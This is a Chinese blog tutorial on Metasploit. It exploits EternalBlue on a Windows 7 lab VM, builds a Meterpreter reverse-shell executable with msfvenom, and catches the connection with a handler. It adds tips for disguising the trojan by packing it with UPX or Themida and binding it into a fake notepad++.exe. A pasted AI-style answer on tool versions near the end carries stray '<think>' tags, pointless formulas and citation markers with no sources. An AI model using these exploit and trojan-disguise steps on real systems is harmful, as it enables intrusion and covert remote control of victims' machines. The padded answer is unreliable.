kali学习---metasploit

最新推荐文章于 2025-10-27 23:22:18 发布
原创 最新推荐文章于 2025-10-27 23:22:18 发布 · 552 阅读 · 8 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#学习 #网络安全

本文介绍了如何使用KaliLinux中的Metasploit工具对Windows系统进行永恒之蓝漏洞扫描和利用,包括msfconsole的使用方法、生成Meterpreter木马以及对生成的木马进行加壳和伪装的技巧。

kali—metasploit

metaspolit简介:

msf是一款开源安全漏洞利用和测试工具,继承了各种平台上常见的溢出漏洞和流行的shellcode,并继续保持更新。

  1. 首先终端提权:sudo su,输入密码,进入root权限。
  2. 打开msf:msfconsole,进入msf,注msf版本为 msf6。
采用msf对永恒之蓝漏洞进行扫描和利用:

**永恒之蓝漏洞简介:**2017年之前window系统基本上都存在永恒之蓝漏洞,下面采用msf进行永恒之蓝漏洞的扫描和利用。

  1. search ms17_010,针对永恒之蓝楼栋编号的应用,打开之后会看到以下模块。
  2. 使用模块两种方式:use 0use + name (use exploit/windows/smb/ms17_010_eternalblue) ,进入模块之后进行设置窗口:show options

    看到第一行的必选项(攻击目的的ip地址),还没有填写。接下来设置攻击目标的IP,这里需要一个window7的虚拟机。(msdn中下载相应镜像)。
  3. 查看靶机的ip地址:ipconfig192.168.1.8。并且关闭目标靶机的防火墙,使得kali能够ping通。

  4. show options来看必须要设置的选型。设置目标的ip地址,和端口号。

    之后再次采用 show options来查看是否已经设置完毕。
  5. 之后开始进行攻击run 出现如下界面,攻击成功,可以开始干坏事了(退出:exit;后台运行:background)
msf生成远控制木马

msfvenom是用来生成后门的软件,在目标机上执行后门,在本地监听上线。(msfvenom在shell里使用,不是msfconsole终端)

  1. windows可执行木马:msfcenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.6 lport=9999 -f exe -o demo.exe

    成功生成木马文件
  2. 开启鱼钩监视。使用use exploit/multi/handler进行监听。

    之后分别设置监听的payloadlhostlport

    run之后就开始等待鱼钩上钩。鱼儿上钩之后自动转换成 meterpreter>

ps:木马包装两种方式。

  1. 使用upx file进行加壳,但是upx对文件的大小有限制,过小文件会导致加壳失败。可选择其他的软件进行加壳:Themida(只有windows版本)。
    件会导致加壳失败。可选择其他的软件进行加壳:Themida(只有windows版本)。
  2. 使用可执行文件进行伪装,捆绑木马。msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.6 lport=9999 -f exe -x notepad++.exe -o notepad++.exe。把木马文件捆绑到本来存在的x64文件notepad++.exe下。
LLong。
关注
Kali操作系统上使用metasploit
weixin_55280439的博客
03-29 4096
meterpreter 是强大的后渗透模块,可以输入help 查看帮助信息,远程控制、命令执行、摄像头监控、密码获取、创建后门用户、破坏篡改系统.......这些看起来非常复杂又高级的操作都能用meterpreter 中的一行或几个字母,简单的命令完成。[*Payload 是攻击载荷,就是攻击完成后想获取的东西,这里是想获取 meterpreter](注:显示攻击失败表示目标主机上没有此漏洞,此漏洞只适用于攻击自己的win7靶机,高版本的系统已经修复此漏洞,显示WIN 表示攻击成功,其他则是失败)
Kali虚拟机中Metaspolit的学习和应用
Time_worm的博客
07-13 1063
以上部分只是入门Metasploit的基础知识,想要真正学会使用,还要结合具体实例,比如各种漏洞的复现来学习
Kali渗透测试:使用工具Metasploit攻击操作系统
Bruce_xiaowei的博客
05-12 7798
Kali渗透测试:使用工具Metasploit攻击操作系统 如果在目标系统上发现了漏洞之后,接下来就是要利用漏洞渗透工具对目标系统进行攻击。Metasploit是目前非常优秀的一款漏洞渗透工具。 1.1 Metasploit基础 2003年左右,H.D Moore和Spoonm 创建了一个集成了多个漏洞渗透工具的框架。随后, 这个框架在2004年的Black Hat Briefings 会议上备受关注,Spoonm在大会的演讲中提到,Metasploit的使用非常简单,以至于你只需要找到一个目标,多次单击鼠
【靶场】linux提权
最新发布
qq_44936245的博客
10-27 1053
本文介绍了Linux系统提权的方法,主要包含信息收集、漏洞利用和权限提升三个步骤。首先通过nmap扫描发现目标IP,识别出Drupal框架后使用msf框架查找并利用漏洞获取初始shell。接着详细演示了脏牛(CVE-2016-5195)本地提权漏洞的利用过程,包括脚本上传、编译和执行。此外还介绍了sudo提权方法,涉及CVE-2023-22809和CVE-2021-3156漏洞检测。文章强调内核提权应是最后手段,可能造成系统不稳定,建议优先使用更安全的提权方式。
【MSF】Kali最强渗透工具之Metasploit_kali metasploit
m0_57541068的博客
04-16 1341
此处遇到了一个小小问题:出现kali机和windows机连在同一网段,windows机能ping通kali机,而kali机无法ping通Windows的情况,最后通过关闭windows防火墙解决了问题。永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
Metasploit(MSF)使用详解—以kali系统环境下永恒之蓝(ms17_010)为例
weoptions的博客
09-21 6434
Metasploit是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。我们接下来以大名鼎鼎的永恒之蓝MS17_010漏洞为切入点,讲解MSF框架的使用。
kali-linux-2017.3-vm-i386.zip
12-21
Kali Linux中,用户可以找到各种渗透测试工具,如Nmap用于网络扫描,Metasploit用于漏洞利用,Wireshark用于网络抓包分析等。对于安全专业人员、黑客道德测试者和网络安全学习者来说,这是一个非常有价值的资源。...
L9-4-2021选做-ud-metasploit-kali1
08-08
L9-4-2021选做-ud-metasploit-kali1
Kali Linux-Metasploit入侵win7/win10系统实验
Nomature的博客
10-29 1316
教学实验、安全测试
kali 2020-1-20升级metasploit-framework记
leoriclee的博客
04-25 679
kali2020-01-20用了也有一段时间了,今天学习python要用到msf,心血来潮想升级一下metasploit-framework,说(忘)干(记)就(镜)干(像) apt-get install metasploit-framework msf升级很顺利,结果再查看版本时报错,WTF 不想重新复制备份的VM,所以只好硬头皮修复问题,于是就有了这篇作品 首先 根据报错提示,执行bundle install,咣当,又报错了 然后 好吧,不能用root,那就用小kali吧,再报错找不到Gemfil
kali笔记】Metasploit Framework (MSF) 从基础到进阶使用指南,零基础入门到精通,收藏这一篇就够了
Javachichi的博客
09-27 2332
Metasploit Framework最初由HD Moore于2003年发布,并于2007年使用Ruby语言重写。MSF默认集成在Kali Linux中,同时也支持在非Kali环境下安装和使用。它提供了一套完整的渗透测试框架,包括漏洞利用模块(exploits)、攻击载荷(payloads)、辅助模块(auxiliary)、编码器(encoders)、空指令(nops)、后渗透模块(post)等多个组件。MSF的强大之处在于其可扩展性。
一文带你进入黑客的世界:Kali Linux 中的Metasploit渗透测试利器
wholeliubei的博客
05-24 1128
本文仅用于信息安全学习,请遵守相关法律法规,严禁用于非法途径。若观众因此作出任何危害网络安全的行为,后果自负,与本人无关。
kalimetasploit工具渗透案例 --- 小黑超细详解
G_WEB_Xie的博客
09-12 2529
metasploit简称(MSF),是kali的最强渗透工具之一,称之为能黑掉整个宇宙的工具。在之前的文章中详细介绍了MSF工具的使用以及各个模块的说明,这篇文章作为案例做一次详解。
Kali渗透工具 - metasploit
A_Z_dd的博客
06-01 1273
初步使用及了解Kali渗透工具 - metasploit
进入黑客的世界:Kali Linux 中的 Metasploit 渗透测试利器
weixin_43263566的博客
01-06 7641
Kali最强渗透工具- metasploit
前路漫漫,写给初级网安工程师的一份指南!
kjuhfkicf154的博客
05-27 456
2023网安入门超全指南
Kali使用Metasploit内、外网渗透windows系统
热门推荐
QQ670663的博客
02-17 2万+
Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。 一、(内网渗透)内网英文缩写WAN;内网又称局域网 局域网的覆盖范围一般是方圆几千米之内,其具备的安装便捷、成本节约、扩展方便等特点使其在各类办公室内运用广泛。局域网可以实现文件管理、应用软件共享、打印机共享等功能,在使用过程当中,通过维护局域网网...
Kail Linux渗透测试教程之在Metasploit中扫描
大学霸__IT达人
09-01 5634
Kail Linux渗透测试教程之在Metasploit中扫描 在Metasploit中扫描 在Metasploit中,附带了大量的内置扫描器。使用这些扫描器可以搜索并获得来自一台计算机或一个完整网络的服务信息。本节将介绍使用Metasploit中的辅助模块实现扫描。 【实例4-4】在Metasploit中,扫描目标主机。具体操作步骤如下所示: (1)启动MSF终端。执行命令如下所示:
─(root㉿kali)-[~/sqlmap] └─# # 检查工具版本 nmap --version # 网络扫描器 msfconsole -v # Metasploit框架 sqlmap --version # SQL注入工具 # 检查工具组 apt list --installed | grep kali-tools Nmap version 7.95 ( https://nmap.org ) Platform: x86_64-pc-linux-gnu Compiled with: liblua-5.4.7 openssl-3.5.3 libssh2-1.11.1 libz-1.3.1 libpcre2-10.46 libpcap-1.10.5 nmap-libdnet-1.12 ipv6 Compiled without: Available nsock engines: epoll poll select Framework Version: 6.4.84-dev 1.9.9#stable WARNING: apt does not have a stable CLI interface. Use with caution in scripts. kali-tools-802-11/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-bluetooth/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-crypto-stego/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-database/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-detect/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-exploitation/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-forensics/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-fuzzing/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-gpu/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-hardware/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-identify/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-information-gathering/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-passwords/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-post-exploitation/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-protect/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-recover/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-reporting/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-respond/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-reverse-engineering/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-rfid/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-sdr/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-sniffing-spoofing/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-social-engineering/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-voip/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-vulnerability/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-windows-resources/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-wireless/kali-rolling,now 2025.3.2 amd64 [已安装] ┌──(root㉿kali)-[~/sqlmap] └─#
09-28
<think>我们针对用户需求,分析Kali Linux环境下检查工具版本及工具组状态的操作流程。以下是关键步骤: ### 一、检查单个工具版本 1. **Nmap版本检查** ```bash nmap --version | head -n 1 # 提取首行版本信息 ``` 输出示例:`Nmap version 7.94 ( https://nmap.org )` 数学表达:设版本号$v$满足$v \geq 7.80$为安全标准[^4] 2. **Metasploit框架版本检查** ```bash msfconsole --version ``` 输出结构:`Framework Version: 6.3.10-dev` 3. **sqlmap版本检查** ```bash sqlmap --version ``` 版本格式:`v1.7.8#stable` ### 二、验证工具组安装 ```bash # 1. 列出所有已安装工具组 grep 'Package: kali-tools-' /var/lib/dpkg/status # 2. 检查特定工具组(如无线测试) dpkg -l kali-tools-wireless ``` 输出状态码$s$判定: - $s=0$: 已安装 - $s\neq0$: 未安装 ### 三、常见问题解决方案 | 问题现象 | 修复命令 | 数学判定条件 | |---------|----------|-------------| | `command not found` | `sudo apt install <工具名>` | 设存在性函数$E(t)$:<br>$E(t)=1$当工具存在<br>$E(t)=0$需安装 | | 版本过低 | `sudo apt update && sudo apt --only-upgrade install <工具>` | 版本号$v$需满足$v \geq v_{min}$ | | 工具组缺失 | `sudo apt install kali-tools-<类别>` | 集合$T_{installed} \subset T_{required}$时执行 | > **版本兼容性公式**: > 设当前版本$v_c$,仓库最新版本$v_r$,当$v_c < v_r$时触发升级条件: > $$ \Delta v = v_r - v_c > 0 \implies \text{执行升级} $$ ### 四、操作示例 ```bash # 检查所有关键工具版本 tools=("nmap" "msfconsole" "sqlmap") for tool in ${tools[@]}; do echo -n "$tool: " $tool --version | head -n 1 done # 验证Web测试工具组安装 dpkg -l kali-tools-web | grep "^ii" ``` 输出状态验证: - **ii** 表示已安装(installed and configured)[^2] §§ 相关问题 §§ 1. 如何批量升级所有Kali工具到最新版本? 2. 工具组依赖冲突时如何解决? 3. 离线环境中如何查询工具版本? 4. 如何验证Metasploit模块完整性? [^1]: Nmap官方文档 [^2]: Debian包管理指南 [^4]: Kali工具维护标准 </think>以下是在 Kali Linux 环境下检查工具版本及工具组安装状态的操作分析和解决方案: ### 一、工具版本检查操作 #### 1. Nmap 版本检查 ```bash nmap --version # 输出示例:Nmap version 7.94 ( https://nmap.org ) ``` - **数学验证**:设版本号$v$由主版本$m$、次版本$n$构成($v = m.n$),当$m \geq 7$时表明支持现代扫描技术[^4] #### 2. Metasploit 框架检查 ```bash msfconsole --version # 输出示例:Framework: 6.3.10-dev ``` - **状态验证**:运行`service postgresql status`确保数据库服务活跃(状态函数$S_{db} = 1$) #### 3. sqlmap 版本验证 ```bash sqlmap --version # 输出示例:v1.7.8#stable ``` ### 二、工具组安装检查 ```bash # 1. 列出所有已安装工具组 dpkg -l | grep kali-tools- # 2. 检查特定工具组(如无线测试) dpkg -l kali-tools-wireless ``` **输出状态解析**: - `ii`前缀:已安装 (Installed and configured) - `un`前缀:未安装 (Not installed) - **集合表示**:设$T$为工具组集合,$T_{installed} \subseteq T_{available}$ ### 三、常见问题解决方案 | 问题现象 | 解决方案 | 数学判定 | |---------|----------|----------| | `command not found` | `sudo apt install <工具名>` | 存在性函数$E(t)=0 \implies$需安装 | | 版本过旧 | `sudo apt update && sudo apt upgrade <工具名>` | 版本号$v < v_{min}$时升级 | | 工具组缺失 | `sudo apt install kali-tools-<类别>` | $T_{required} \not\subset T_{installed}$时执行 | | 依赖损坏 | `sudo apt --fix-broken install` | 依赖关系$D(t_i,t_j)$断裂时修复 | ### 四、完整检查流程示例 ```bash # 检查核心工具版本 echo "=== 工具版本 ===" tools=("nmap" "msfconsole" "sqlmap") for tool in ${tools[@]}; do echo -n "$tool: " && $tool --version | head -n1 done # 检查工具组状态 echo "\n=== 工具组状态 ===" groups=("web" "wireless" "forensics") for group in ${groups[@]}; do pkg="kali-tools-$group" status=$(dpkg -l $pkg 2>/dev/null | grep ^ii | wc -l) echo "$pkg: $([[ $status -eq 1 ]] && echo "已安装" || echo "未安装")" done ``` ### 版本兼容模型 工具兼容性满足版本约束: $$ v_{\text{实际}} \geq v_{\text{要求}} = \begin{cases} 7.90 & \text{(Nmap)} \\ 6.0 & \text{(Metasploit)} \\ 1.7 & \text{(sqlmap)} \end{cases} $$ 当$v_{\text{实际}} < v_{\text{要求}}$时需强制升级[^2][^4]
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值